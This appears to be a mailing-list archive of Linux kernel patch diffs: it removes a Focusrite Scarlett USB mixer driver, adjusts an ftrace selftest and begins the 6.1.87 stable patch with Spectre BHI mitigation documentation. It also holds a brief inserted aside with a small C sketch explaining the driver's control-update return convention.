+-	/* If MSD mode is off, hide the switch by default */
+-	if (!private->msd_switch && !(mixer->chip->setup & SCARLETT2_MSD_ENABLE))
+-		return 0;
+-
+-	/* Add MSD control */
+-	return scarlett2_add_new_ctl(mixer, &scarlett2_msd_ctl,
+-				     0, 1, "MSD Mode Switch", NULL);
+-}
+-
+-/*** Standalone Control ***/
+-
+-static int scarlett2_standalone_ctl_get(struct snd_kcontrol *kctl,
+-					struct snd_ctl_elem_value *ucontrol)
+-{
+-	struct usb_mixer_elem_info *elem = kctl->private_data;
+-	struct scarlett2_data *private = elem->head.mixer->private_data;
+-
+-	ucontrol->value.integer.value[0] = private->standalone_switch;
+-	return 0;
+-}
+-
+-static int scarlett2_standalone_ctl_put(struct snd_kcontrol *kctl,
+-					struct snd_ctl_elem_value *ucontrol)
+-{
+-	struct usb_mixer_elem_info *elem = kctl->private_data;
+-	struct usb_mixer_interface *mixer = elem->head.mixer;
+-	struct scarlett2_data *private = mixer->private_data;
+-
+-	int oval, val, err = 0;
+-
+-	mutex_lock(&private->data_mutex);
+-
+-	oval = private->standalone_switch;
+-	val = !!ucontrol->value.integer.value[0];
+-
+-	if (oval == val)
+-		goto unlock;
+-
+-	private->standalone_switch = val;
+-
+-	/* Send switch change to the device */
+-	err = scarlett2_usb_set_config(mixer,
+-				       SCARLETT2_CONFIG_STANDALONE_SWITCH,
+-				       0, val);
+-	if (err == 0)
+-		err = 1;
+-
+-unlock:
+-	mutex_unlock(&private->data_mutex);
+-	return err;
+-}
+-
+-static const struct snd_kcontrol_new scarlett2_standalone_ctl = {
+-	.iface = SNDRV_CTL_ELEM_IFACE_MIXER,
+-	.name = "",
+-	.info = snd_ctl_boolean_mono_info,
+-	.get  = scarlett2_standalone_ctl_get,
+-	.put  = scarlett2_standalone_ctl_put,
+-};
+-
+-static int scarlett2_add_standalone_ctl(struct usb_mixer_interface *mixer)
+-{
+-	struct scarlett2_data *private = mixer->private_data;
+-
+-	if (private->info->config_set == SCARLETT2_CONFIG_SET_NO_MIXER)
+-		return 0;
+-
+-	/* Add standalone control */
+-	return scarlett2_add_new_ctl(mixer, &scarlett2_standalone_ctl,
+-				     0, 1, "Standalone Switch", NULL);
+-}
+-
+-/*** Cleanup/Suspend Callbacks ***/
+-
+-static void scarlett2_private_free(struct usb_mixer_interface *mixer)
+-{
+-	struct scarlett2_data *private = mixer->private_data;
+-
+-	cancel_delayed_work_sync(&private->work);
+-	kfree(private);
+-	mixer->private_data = NULL;
+-}
+-
+-static void scarlett2_private_suspend(struct usb_mixer_interface *mixer)
+-{
+-	struct scarlett2_data *private = mixer->private_data;
+-
+-	if (cancel_delayed_work_sync(&private->work))
+-		scarlett2_config_save(private->mixer);
+-}
+-
+-/*** Initialisation ***/
+-
+-static void scarlett2_count_mux_io(struct scarlett2_data *private)
+-{
+-	const struct scarlett2_device_info *info = private->info;
+-	const int (*port_count)[SCARLETT2_PORT_DIRNS] = info->port_count;
+-	int port_type, srcs = 0, dsts = 0;
+-
+-	for (port_type = 0;
+-	     port_type < SCARLETT2_PORT_TYPE_COUNT;
+-	     port_type++) {
+-		srcs += port_count[port_type][SCARLETT2_PORT_IN];
+-		dsts += port_count[port_type][SCARLETT2_PORT_OUT];
+-	}
+-
+-	private->num_mux_srcs = srcs;
+-	private->num_mux_dsts = dsts;
+-}
+-
+-/* Look through the interface descriptors for the Focusrite Control
+- * interface (bInterfaceClass = 255 Vendor Specific Class) and set
+- * bInterfaceNumber, bEndpointAddress, wMaxPacketSize, and bInterval
+- * in private
+- */
+-static int scarlett2_find_fc_interface(struct usb_device *dev,
+-				       struct scarlett2_data *private)
+-{
+-	struct usb_host_config *config = dev->actconfig;
+-	int i;
+-
+-	for (i = 0; i < config->desc.bNumInterfaces; i++) {
+-		struct usb_interface *intf = config->interface[i];
+-		struct usb_interface_descriptor *desc =
+-			&intf->altsetting[0].desc;
+-		struct usb_endpoint_descriptor *epd;
+-
+-		if (desc->bInterfaceClass != 255)
+-			continue;
+-
+-		epd = get_endpoint(intf->altsetting, 0);
+-		private->bInterfaceNumber = desc->bInterfaceNumber;
+-		private->bEndpointAddress = epd->bEndpointAddress &
+-			USB_ENDPOINT_NUMBER_MASK;
+-		private->wMaxPacketSize = le16_to_cpu(epd->wMaxPacketSize);
+-		private->bInterval = epd->bInterval;
+-		return 0;
+-	}
+-
+-	return -EINVAL;
+-}
+-
+-/* Initialise private data */
+-static int scarlett2_init_private(struct usb_mixer_interface *mixer,
+-				  const struct scarlett2_device_info *info)
+-{
+-	struct scarlett2_data *private =
+-		kzalloc(sizeof(struct scarlett2_data), GFP_KERNEL);
+-
+-	if (!private)
+-		return -ENOMEM;
+-
+-	mutex_init(&private->usb_mutex);
+-	mutex_init(&private->data_mutex);
+-	INIT_DELAYED_WORK(&private->work, scarlett2_config_save_work);
+-
+-	mixer->private_data = private;
+-	mixer->private_free = scarlett2_private_free;
+-	mixer->private_suspend = scarlett2_private_suspend;
+-
+-	private->info = info;
+-	scarlett2_count_mux_io(private);
+-	private->scarlett2_seq = 0;
+-	private->mixer = mixer;
+-
+-	return scarlett2_find_fc_interface(mixer->chip->dev, private);
+-}
+-
+-/* Cargo cult proprietary initialisation sequence */
+-static int scarlett2_usb_init(struct usb_mixer_interface *mixer)
+-{
+-	struct usb_device *dev = mixer->chip->dev;
+-	struct scarlett2_data *private = mixer->private_data;
+-	u8 buf[24];
+-	int err;
+-
+-	if (usb_pipe_type_check(dev, usb_sndctrlpipe(dev, 0)))
+-		return -EINVAL;
+-
+-	/* step 0 */
+-	err = scarlett2_usb_rx(dev, private->bInterfaceNumber,
+-			       SCARLETT2_USB_CMD_INIT, buf, sizeof(buf));
+-	if (err < 0)
+-		return err;
+-
+-	/* step 1 */
+-	private->scarlett2_seq = 1;
+-	err = scarlett2_usb(mixer, SCARLETT2_USB_INIT_1, NULL, 0, NULL, 0);
+-	if (err < 0)
+-		return err;
+-
+-	/* step 2 */
+-	private->scarlett2_seq = 1;
+-	return scarlett2_usb(mixer, SCARLETT2_USB_INIT_2, NULL, 0, NULL, 84);
+-}
+-
+-/* Read configuration from the interface on start */
+-static int scarlett2_read_configs(struct usb_mixer_interface *mixer)
+-{
+-	struct scarlett2_data *private = mixer->private_data;
+-	const struct scarlett2_device_info *info = private->info;
+-	const int (*port_count)[SCARLETT2_PORT_DIRNS] = info->port_count;
+-	int num_line_out =
+-		port_count[SCARLETT2_PORT_TYPE_ANALOGUE][SCARLETT2_PORT_OUT];
+-	int num_mixer_out =
+-		port_count[SCARLETT2_PORT_TYPE_MIX][SCARLETT2_PORT_IN];
+-	struct scarlett2_usb_volume_status volume_status;
+-	int err, i;
+-
+-	if (info->has_msd_mode) {
+-		err = scarlett2_usb_get_config(
+-			mixer, SCARLETT2_CONFIG_MSD_SWITCH,
+-			1, &private->msd_switch);
+-		if (err < 0)
+-			return err;
+-
+-		/* no other controls are created if MSD mode is on */
+-		if (private->msd_switch)
+-			return 0;
+-	}
+-
+-	err = scarlett2_update_input_other(mixer);
+-	if (err < 0)
+-		return err;
+-
+-	err = scarlett2_update_monitor_other(mixer);
+-	if (err < 0)
+-		return err;
+-
+-	/* the rest of the configuration is for devices with a mixer */
+-	if (info->config_set == SCARLETT2_CONFIG_SET_NO_MIXER)
+-		return 0;
+-
+-	err = scarlett2_usb_get_config(
+-		mixer, SCARLETT2_CONFIG_STANDALONE_SWITCH,
+-		1, &private->standalone_switch);
+-	if (err < 0)
+-		return err;
+-
+-	err = scarlett2_update_sync(mixer);
+-	if (err < 0)
+-		return err;
+-
+-	err = scarlett2_usb_get_volume_status(mixer, &volume_status);
+-	if (err < 0)
+-		return err;
+-
+-	if (info->line_out_hw_vol)
+-		for (i = 0; i < SCARLETT2_DIM_MUTE_COUNT; i++)
+-			private->dim_mute[i] = !!volume_status.dim_mute[i];
+-
+-	private->master_vol = clamp(
+-		volume_status.master_vol + SCARLETT2_VOLUME_BIAS,
+-		0, SCARLETT2_VOLUME_BIAS);
+-
+-	for (i = 0; i < num_line_out; i++) {
+-		int volume, mute;
+-
+-		private->vol_sw_hw_switch[i] =
+-			info->line_out_hw_vol
+-				&& volume_status.sw_hw_switch[i];
+-
+-		volume = private->vol_sw_hw_switch[i]
+-			   ? volume_status.master_vol
+-			   : volume_status.sw_vol[i];
+-		volume = clamp(volume + SCARLETT2_VOLUME_BIAS,
+-			       0, SCARLETT2_VOLUME_BIAS);
+-		private->vol[i] = volume;
+-
+-		mute = private->vol_sw_hw_switch[i]
+-			 ? private->dim_mute[SCARLETT2_BUTTON_MUTE]
+-			 : volume_status.mute_switch[i];
+-		private->mute_switch[i] = mute;
+-	}
+-
+-	for (i = 0; i < num_mixer_out; i++) {
+-		err = scarlett2_usb_get_mix(mixer, i);
+-		if (err < 0)
+-			return err;
+-	}
+-
+-	return scarlett2_usb_get_mux(mixer);
+-}
+-
+-/* Notify on sync change */
+-static void scarlett2_notify_sync(
+-	struct usb_mixer_interface *mixer)
+-{
+-	struct scarlett2_data *private = mixer->private_data;
+-
+-	private->sync_updated = 1;
+-
+-	snd_ctl_notify(mixer->chip->card, SNDRV_CTL_EVENT_MASK_VALUE,
+-		       &private->sync_ctl->id);
+-}
+-
+-/* Notify on monitor change */
+-static void scarlett2_notify_monitor(
+-	struct usb_mixer_interface *mixer)
+-{
+-	struct snd_card *card = mixer->chip->card;
+-	struct scarlett2_data *private = mixer->private_data;
+-	const struct scarlett2_device_info *info = private->info;
+-	const int (*port_count)[SCARLETT2_PORT_DIRNS] = info->port_count;
+-	int num_line_out =
+-		port_count[SCARLETT2_PORT_TYPE_ANALOGUE][SCARLETT2_PORT_OUT];
+-	int i;
+-
+-	/* if line_out_hw_vol is 0, there are no controls to update */
+-	if (!info->line_out_hw_vol)
+-		return;
+-
+-	private->vol_updated = 1;
+-
+-	snd_ctl_notify(mixer->chip->card, SNDRV_CTL_EVENT_MASK_VALUE,
+-		       &private->master_vol_ctl->id);
+-
+-	for (i = 0; i < num_line_out; i++)
+-		if (private->vol_sw_hw_switch[line_out_remap(private, i)])
+-			snd_ctl_notify(card, SNDRV_CTL_EVENT_MASK_VALUE,
+-				       &private->vol_ctls[i]->id);
+-}
+-
+-/* Notify on dim/mute change */
+-static void scarlett2_notify_dim_mute(
+-	struct usb_mixer_interface *mixer)
+-{
+-	struct snd_card *card = mixer->chip->card;
+-	struct scarlett2_data *private = mixer->private_data;
+-	const struct scarlett2_device_info *info = private->info;
+-	const int (*port_count)[SCARLETT2_PORT_DIRNS] = info->port_count;
+-	int num_line_out =
+-		port_count[SCARLETT2_PORT_TYPE_ANALOGUE][SCARLETT2_PORT_OUT];
+-	int i;
+-
+-	private->vol_updated = 1;
+-
+-	if (!info->line_out_hw_vol)
+-		return;
+-
+-	for (i = 0; i < SCARLETT2_DIM_MUTE_COUNT; i++)
+-		snd_ctl_notify(card, SNDRV_CTL_EVENT_MASK_VALUE,
+-			       &private->dim_mute_ctls[i]->id);
+-
+-	for (i = 0; i < num_line_out; i++)
+-		if (private->vol_sw_hw_switch[line_out_remap(private, i)])
+-			snd_ctl_notify(card, SNDRV_CTL_EVENT_MASK_VALUE,
+-				       &private->mute_ctls[i]->id);
+-}
+-
+-/* Notify on "input other" change (level/pad/air) */
+-static void scarlett2_notify_input_other(
+-	struct usb_mixer_interface *mixer)
+-{
+-	struct snd_card *card = mixer->chip->card;
+-	struct scarlett2_data *private = mixer->private_data;
+-	const struct scarlett2_device_info *info = private->info;
+-	int i;
+-
+-	private->input_other_updated = 1;
+-
+-	for (i = 0; i < info->level_input_count; i++)
+-		snd_ctl_notify(card, SNDRV_CTL_EVENT_MASK_VALUE,
+-			       &private->level_ctls[i]->id);
+-	for (i = 0; i < info->pad_input_count; i++)
+-		snd_ctl_notify(card, SNDRV_CTL_EVENT_MASK_VALUE,
+-			       &private->pad_ctls[i]->id);
+-	for (i = 0; i < info->air_input_count; i++)
+-		snd_ctl_notify(card, SNDRV_CTL_EVENT_MASK_VALUE,
+-			       &private->air_ctls[i]->id);
+-	for (i = 0; i < info->phantom_count; i++)
+-		snd_ctl_notify(card, SNDRV_CTL_EVENT_MASK_VALUE,
+-			       &private->phantom_ctls[i]->id);
+-}
+-
+-/* Notify on "monitor other" change (direct monitor, speaker
+- * switching, talkback)
+- */
+-static void scarlett2_notify_monitor_other(
+-	struct usb_mixer_interface *mixer)
+-{
+-	struct snd_card *card = mixer->chip->card;
+-	struct scarlett2_data *private = mixer->private_data;
+-	const struct scarlett2_device_info *info = private->info;
+-
+-	private->monitor_other_updated = 1;
+-
+-	if (info->direct_monitor) {
+-		snd_ctl_notify(card, SNDRV_CTL_EVENT_MASK_VALUE,
+-			       &private->direct_monitor_ctl->id);
+-		return;
+-	}
+-
+-	if (info->has_speaker_switching)
+-		snd_ctl_notify(card, SNDRV_CTL_EVENT_MASK_VALUE,
+-			       &private->speaker_switching_ctl->id);
+-
+-	if (info->has_talkback)
+-		snd_ctl_notify(card, SNDRV_CTL_EVENT_MASK_VALUE,
+-			       &private->talkback_ctl->id);
+-
+-	/* if speaker switching was recently enabled or disabled,
+-	 * invalidate the dim/mute and mux enum controls
+-	 */
+-	if (private->speaker_switching_switched) {
+-		int i;
+-
+-		scarlett2_notify_dim_mute(mixer);
+-
+-		private->speaker_switching_switched = 0;
+-		private->mux_updated = 1;
+-
+-		for (i = 0; i < private->num_mux_dsts; i++)
+-			snd_ctl_notify(card, SNDRV_CTL_EVENT_MASK_VALUE,
+-				       &private->mux_ctls[i]->id);
+-	}
+-}
+-
+-/* Interrupt callback */
+-static void scarlett2_notify(struct urb *urb)
+-{
+-	struct usb_mixer_interface *mixer = urb->context;
+-	int len = urb->actual_length;
+-	int ustatus = urb->status;
+-	u32 data;
+-
+-	if (ustatus != 0 || len != 8)
+-		goto requeue;
+-
+-	data = le32_to_cpu(*(__le32 *)urb->transfer_buffer);
+-	if (data & SCARLETT2_USB_NOTIFY_SYNC)
+-		scarlett2_notify_sync(mixer);
+-	if (data & SCARLETT2_USB_NOTIFY_MONITOR)
+-		scarlett2_notify_monitor(mixer);
+-	if (data & SCARLETT2_USB_NOTIFY_DIM_MUTE)
+-		scarlett2_notify_dim_mute(mixer);
+-	if (data & SCARLETT2_USB_NOTIFY_INPUT_OTHER)
+-		scarlett2_notify_input_other(mixer);
+-	if (data & SCARLETT2_USB_NOTIFY_MONITOR_OTHER)
+-		scarlett2_notify_monitor_other(mixer);
+-
+-requeue:
+-	if (ustatus != -ENOENT &&
+-	    ustatus != -ECONNRESET &&
+-	    ustatus != -ESHUTDOWN) {
+-		urb->dev = mixer->chip->dev;
+-		usb_submit_urb(urb, GFP_ATOMIC);
+-	}
+-}
+-
+-static int scarlett2_init_notify(struct usb_mixer_interface *mixer)
+-{
+-	struct usb_device *dev = mixer->chip->dev;
+-	struct scarlett2_data *private = mixer->private_data;
+-	unsigned int pipe = usb_rcvintpipe(dev, private->bEndpointAddress);
+-	void *transfer_buffer;
+-
+-	if (mixer->urb) {
+-		usb_audio_err(mixer->chip,
+-			      "%s: mixer urb already in use!\n", __func__);
+-		return 0;
+-	}
+-
+-	if (usb_pipe_type_check(dev, pipe))
+-		return -EINVAL;
+-
+-	mixer->urb = usb_alloc_urb(0, GFP_KERNEL);
+-	if (!mixer->urb)
+-		return -ENOMEM;
+-
+-	transfer_buffer = kmalloc(private->wMaxPacketSize, GFP_KERNEL);
+-	if (!transfer_buffer)
+-		return -ENOMEM;
+-
+-	usb_fill_int_urb(mixer->urb, dev, pipe,
+-			 transfer_buffer, private->wMaxPacketSize,
+-			 scarlett2_notify, mixer, private->bInterval);
+-
+-	return usb_submit_urb(mixer->urb, GFP_KERNEL);
+-}
+-
+-static int snd_scarlett_gen2_controls_create(struct usb_mixer_interface *mixer)
+-{
+-	const struct scarlett2_device_info **info = scarlett2_devices;
+-	int err;
+-
+-	/* Find device in scarlett2_devices */
+-	while (*info && (*info)->usb_id != mixer->chip->usb_id)
+-		info++;
+-	if (!*info)
+-		return -EINVAL;
+-
+-	/* Initialise private data */
+-	err = scarlett2_init_private(mixer, *info);
+-	if (err < 0)
+-		return err;
+-
+-	/* Send proprietary USB initialisation sequence */
+-	err = scarlett2_usb_init(mixer);
+-	if (err < 0)
+-		return err;
+-
+-	/* Read volume levels and controls from the interface */
+-	err = scarlett2_read_configs(mixer);
+-	if (err < 0)
+-		return err;
+-
+-	/* Create the MSD control */
+-	err = scarlett2_add_msd_ctl(mixer);
+-	if (err < 0)
+-		return err;
+-
+-	/* If MSD mode is enabled, don't create any other controls */
+-	if (((struct scarlett2_data *)mixer->private_data)->msd_switch)
+-		return 0;
+-
+-	/* Create the analogue output controls */
+-	err = scarlett2_add_line_out_ctls(mixer);
+-	if (err < 0)
+-		return err;
+-
+-	/* Create the analogue input controls */
+-	err = scarlett2_add_line_in_ctls(mixer);
+-	if (err < 0)
+-		return err;
+-
+-	/* Create the input, output, and mixer mux input selections */
+-	err = scarlett2_add_mux_enums(mixer);
+-	if (err < 0)
+-		return err;
+-
+-	/* Create the matrix mixer controls */
+-	err = scarlett2_add_mixer_ctls(mixer);
+-	if (err < 0)
+-		return err;
+-
+-	/* Create the level meter controls */
+-	err = scarlett2_add_meter_ctl(mixer);
+-	if (err < 0)
+-		return err;
+-
+-	/* Create the sync control */
+-	err = scarlett2_add_sync_ctl(mixer);
+-	if (err < 0)
+-		return err;
+-
+-	/* Create the direct monitor control */
+-	err = scarlett2_add_direct_monitor_ctl(mixer);
+-	if (err < 0)
+-		return err;
+-
+-	/* Create the speaker switching control */
+-	err = scarlett2_add_speaker_switch_ctl(mixer);
+-	if (err < 0)
+-		return err;
+-
+-	/* Create the talkback controls */
+-	err = scarlett2_add_talkback_ctls(mixer);
+-	if (err < 0)
+-		return err;
+-
+-	/* Create the standalone control */
+-	err = scarlett2_add_standalone_ctl(mixer);
+-	if (err < 0)
+-		return err;
+-
+-	/* Set up the interrupt polling */
+-	err = scarlett2_init_notify(mixer);
+-	if (err < 0)
+-		return err;
+-
+-	return 0;
+-}
+-
+-int snd_scarlett_gen2_init(struct usb_mixer_interface *mixer)
+-{
+-	struct snd_usb_audio *chip = mixer->chip;
+-	int err;
+-
+-	/* only use UAC_VERSION_2 */
+-	if (!mixer->protocol)
+-		return 0;
+-
+-	if (!(chip->setup & SCARLETT2_ENABLE)) {
+-		usb_audio_info(chip,
+-			"Focusrite Scarlett Gen 2/3 Mixer Driver disabled; "
+-			"use options snd_usb_audio vid=0x%04x pid=0x%04x "
+-			"device_setup=1 to enable and report any issues "
+-			"to g@b4.vu",
+-			USB_ID_VENDOR(chip->usb_id),
+-			USB_ID_PRODUCT(chip->usb_id));
+-		return 0;
+-	}
+-
+-	usb_audio_info(chip,
+-		"Focusrite Scarlett Gen 2/3 Mixer Driver enabled pid=0x%04x",
+-		USB_ID_PRODUCT(chip->usb_id));
+-
+-	err = snd_scarlett_gen2_controls_create(mixer);
+-	if (err < 0)
+-		usb_audio_err(mixer->chip,
+-			      "Error initialising Scarlett Mixer Driver: %d",
+-			      err);
+-
+-	return err;
+-}
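
As an aside on the driver code being removed above: every scarlett2 *_ctl_put callback follows the same ALSA contract, returning 1 when the value changed (so a control notification is broadcast), 0 when it is unchanged, and a negative errno on failure, all under the driver's data mutex. A minimal standalone sketch of that contract, using pthreads in place of the kernel mutex and a stub in place of scarlett2_usb_set_config():

#include <pthread.h>
#include <stdio.h>

struct fake_ctl {
	pthread_mutex_t lock;
	int value;
};

/* stub standing in for scarlett2_usb_set_config(); 0 means success */
static int fake_usb_set(int val) { (void)val; return 0; }

static int fake_ctl_put(struct fake_ctl *ctl, int newval)
{
	int err = 0;

	pthread_mutex_lock(&ctl->lock);
	if (ctl->value == newval)
		goto unlock;		/* unchanged: report 0 */

	ctl->value = newval;
	err = fake_usb_set(newval);	/* push the change to the device */
	if (err == 0)
		err = 1;		/* changed: report 1 */
unlock:
	pthread_mutex_unlock(&ctl->lock);
	return err;
}

int main(void)
{
	struct fake_ctl c = { PTHREAD_MUTEX_INITIALIZER, 0 };
	int first = fake_ctl_put(&c, 5);
	int second = fake_ctl_put(&c, 5);

	printf("%d %d\n", first, second);	/* prints "1 0" */
	return 0;
}
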
+diff --git a/sound/usb/mixer_scarlett_gen2.h b/sound/usb/mixer_scarlett_gen2.h
+deleted file mode 100644
+index 668c6b0cb50a6..0000000000000
+--- a/sound/usb/mixer_scarlett_gen2.h
++++ /dev/null
+@@ -1,7 +0,0 @@
+-/* SPDX-License-Identifier: GPL-2.0 */
+-#ifndef __USB_MIXER_SCARLETT_GEN2_H
+-#define __USB_MIXER_SCARLETT_GEN2_H
+-
+-int snd_scarlett_gen2_init(struct usb_mixer_interface *mixer);
+-
+-#endif /* __USB_MIXER_SCARLETT_GEN2_H */
+diff --git a/tools/testing/selftests/ftrace/test.d/event/subsystem-enable.tc b/tools/testing/selftests/ftrace/test.d/event/subsystem-enable.tc
+index b1ede62498667..b7c8f29c09a97 100644
+--- a/tools/testing/selftests/ftrace/test.d/event/subsystem-enable.tc
++++ b/tools/testing/selftests/ftrace/test.d/event/subsystem-enable.tc
+@@ -18,7 +18,7 @@ echo 'sched:*' > set_event
+ 
+ yield
+ 
+-count=`cat trace | grep -v ^# | awk '{ print $5 }' | sort -u | wc -l`
++count=`head -n 100 trace | grep -v ^# | awk '{ print $5 }' | sort -u | wc -l`
+ if [ $count -lt 3 ]; then
+     fail "at least fork, exec and exit events should be recorded"
+ fi
+@@ -29,7 +29,7 @@ echo 1 > events/sched/enable
+ 
+ yield
+ 
+-count=`cat trace | grep -v ^# | awk '{ print $5 }' | sort -u | wc -l`
++count=`head -n 100 trace | grep -v ^# | awk '{ print $5 }' | sort -u | wc -l`
+ if [ $count -lt 3 ]; then
+     fail "at least fork, exec and exit events should be recorded"
+ fi
+@@ -40,7 +40,7 @@ echo 0 > events/sched/enable
+ 
+ yield
+ 
+-count=`cat trace | grep -v ^# | awk '{ print $5 }' | sort -u | wc -l`
++count=`head -n 100 trace | grep -v ^# | awk '{ print $5 }' | sort -u | wc -l`
+ if [ $count -ne 0 ]; then
+     fail "any of scheduler events should not be recorded"
+ fi


* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2024-04-18  3:05 Alice Ferrazzi
  0 siblings, 0 replies; 161+ messages in thread
From: Alice Ferrazzi @ 2024-04-18  3:05 UTC (permalink / raw
  To: gentoo-commits

commit:     93c626a5c38a14ed6cf7becf888c1dc582cdca9c
Author:     Alice Ferrazzi <alicef <AT> gentoo <DOT> org>
AuthorDate: Thu Apr 18 03:05:18 2024 +0000
Commit:     Alice Ferrazzi <alicef <AT> gentoo <DOT> org>
CommitDate: Thu Apr 18 03:05:18 2024 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=93c626a5

Linux patch 6.1.87

Signed-off-by: Alice Ferrazzi <alicef <AT> gentoo.org>

 0000_README             |    4 +
 1086_linux-6.1.87.patch | 2733 +++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 2737 insertions(+)

diff --git a/0000_README b/0000_README
index d1148845..b5d4486e 100644
--- a/0000_README
+++ b/0000_README
@@ -387,6 +387,10 @@ Patch:  1085_linux-6.1.86.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.1.86
 
+Patch:  1086_linux-6.1.87.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.1.87
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1086_linux-6.1.87.patch b/1086_linux-6.1.87.patch
new file mode 100644
index 00000000..ec06f7c5
--- /dev/null
+++ b/1086_linux-6.1.87.patch
@@ -0,0 +1,2733 @@
+diff --git a/Documentation/admin-guide/hw-vuln/spectre.rst b/Documentation/admin-guide/hw-vuln/spectre.rst
+index 9edb2860a3e19..e0a1be97fa759 100644
+--- a/Documentation/admin-guide/hw-vuln/spectre.rst
++++ b/Documentation/admin-guide/hw-vuln/spectre.rst
+@@ -439,12 +439,12 @@ The possible values in this file are:
+    - System is protected by retpoline
+  * - BHI: BHI_DIS_S
+    - System is protected by BHI_DIS_S
+- * - BHI: SW loop; KVM SW loop
++ * - BHI: SW loop, KVM SW loop
+    - System is protected by software clearing sequence
+- * - BHI: Syscall hardening
+-   - Syscalls are hardened against BHI
+- * - BHI: Syscall hardening; KVM: SW loop
+-   - System is protected from userspace attacks by syscall hardening; KVM is protected by software clearing sequence
++ * - BHI: Vulnerable
++   - System is vulnerable to BHI
++ * - BHI: Vulnerable, KVM: SW loop
++   - System is vulnerable; KVM is protected by software clearing sequence
+ 
+ Full mitigation might require a microcode update from the CPU
+ vendor. When the necessary microcode is not available, the kernel will
+@@ -661,18 +661,14 @@ kernel command line.
+ 	spectre_bhi=
+ 
+ 		[X86] Control mitigation of Branch History Injection
+-		(BHI) vulnerability. Syscalls are hardened against BHI
+-		regardless of this setting. This setting affects the deployment
++		(BHI) vulnerability.  This setting affects the deployment
+ 		of the HW BHI control and the SW BHB clearing sequence.
+ 
+ 		on
+-			unconditionally enable.
++			(default) Enable the HW or SW mitigation as
++			needed.
+ 		off
+-			unconditionally disable.
+-		auto
+-			enable if hardware mitigation
+-			control(BHI_DIS_S) is available, otherwise
+-			enable alternate mitigation in KVM.
++			Disable the mitigation.
+ 
+ For spectre_v2_user see Documentation/admin-guide/kernel-parameters.txt
+ 
+diff --git a/Documentation/admin-guide/kernel-parameters.txt b/Documentation/admin-guide/kernel-parameters.txt
+index b2c7b2f012e90..aebbe2981241a 100644
+--- a/Documentation/admin-guide/kernel-parameters.txt
++++ b/Documentation/admin-guide/kernel-parameters.txt
+@@ -3283,6 +3283,7 @@
+ 					       reg_file_data_sampling=off [X86]
+ 					       retbleed=off [X86]
+ 					       spec_store_bypass_disable=off [X86,PPC]
++					       spectre_bhi=off [X86]
+ 					       spectre_v2_user=off [X86]
+ 					       srbds=off [X86,INTEL]
+ 					       ssbd=force-off [ARM64]
+@@ -5734,16 +5735,13 @@
+ 			See Documentation/admin-guide/laptops/sonypi.rst
+ 
+ 	spectre_bhi=	[X86] Control mitigation of Branch History Injection
+-			(BHI) vulnerability. Syscalls are hardened against BHI
+-			reglardless of this setting. This setting affects the
++			(BHI) vulnerability.  This setting affects the
+ 			deployment of the HW BHI control and the SW BHB
+ 			clearing sequence.
+ 
+-			on   - unconditionally enable.
+-			off  - unconditionally disable.
+-			auto - (default) enable hardware mitigation
+-			       (BHI_DIS_S) if available, otherwise enable
+-			       alternate mitigation in KVM.
++			on   - (default) Enable the HW or SW mitigation
++			       as needed.
++			off  - Disable the mitigation.
+ 
+ 	spectre_v2=	[X86] Control mitigation of Spectre variant 2
+ 			(indirect branch speculation) vulnerability.
+diff --git a/Makefile b/Makefile
+index baddd8ed81868..e46a57006a34f 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 86
++SUBLEVEL = 87
+ EXTRAVERSION =
+ NAME = Curry Ramen
+ 
+diff --git a/arch/arm64/boot/dts/freescale/imx8-ss-conn.dtsi b/arch/arm64/boot/dts/freescale/imx8-ss-conn.dtsi
+index 10370d1a6c6de..dbb298b907c1c 100644
+--- a/arch/arm64/boot/dts/freescale/imx8-ss-conn.dtsi
++++ b/arch/arm64/boot/dts/freescale/imx8-ss-conn.dtsi
+@@ -38,8 +38,8 @@ usdhc1: mmc@5b010000 {
+ 		interrupts = <GIC_SPI 232 IRQ_TYPE_LEVEL_HIGH>;
+ 		reg = <0x5b010000 0x10000>;
+ 		clocks = <&sdhc0_lpcg IMX_LPCG_CLK_4>,
+-			 <&sdhc0_lpcg IMX_LPCG_CLK_0>,
+-			 <&sdhc0_lpcg IMX_LPCG_CLK_5>;
++			 <&sdhc0_lpcg IMX_LPCG_CLK_5>,
++			 <&sdhc0_lpcg IMX_LPCG_CLK_0>;
+ 		clock-names = "ipg", "ahb", "per";
+ 		power-domains = <&pd IMX_SC_R_SDHC_0>;
+ 		status = "disabled";
+@@ -49,8 +49,8 @@ usdhc2: mmc@5b020000 {
+ 		interrupts = <GIC_SPI 233 IRQ_TYPE_LEVEL_HIGH>;
+ 		reg = <0x5b020000 0x10000>;
+ 		clocks = <&sdhc1_lpcg IMX_LPCG_CLK_4>,
+-			 <&sdhc1_lpcg IMX_LPCG_CLK_0>,
+-			 <&sdhc1_lpcg IMX_LPCG_CLK_5>;
++			 <&sdhc1_lpcg IMX_LPCG_CLK_5>,
++			 <&sdhc1_lpcg IMX_LPCG_CLK_0>;
+ 		clock-names = "ipg", "ahb", "per";
+ 		power-domains = <&pd IMX_SC_R_SDHC_1>;
+ 		fsl,tuning-start-tap = <20>;
+@@ -62,8 +62,8 @@ usdhc3: mmc@5b030000 {
+ 		interrupts = <GIC_SPI 234 IRQ_TYPE_LEVEL_HIGH>;
+ 		reg = <0x5b030000 0x10000>;
+ 		clocks = <&sdhc2_lpcg IMX_LPCG_CLK_4>,
+-			 <&sdhc2_lpcg IMX_LPCG_CLK_0>,
+-			 <&sdhc2_lpcg IMX_LPCG_CLK_5>;
++			 <&sdhc2_lpcg IMX_LPCG_CLK_5>,
++			 <&sdhc2_lpcg IMX_LPCG_CLK_0>;
+ 		clock-names = "ipg", "ahb", "per";
+ 		power-domains = <&pd IMX_SC_R_SDHC_2>;
+ 		status = "disabled";
+diff --git a/arch/x86/Kconfig b/arch/x86/Kconfig
+index ba815ac474a1b..5f7a86f240db7 100644
+--- a/arch/x86/Kconfig
++++ b/arch/x86/Kconfig
+@@ -2563,31 +2563,16 @@ config MITIGATION_RFDS
+ 	  stored in floating point, vector and integer registers.
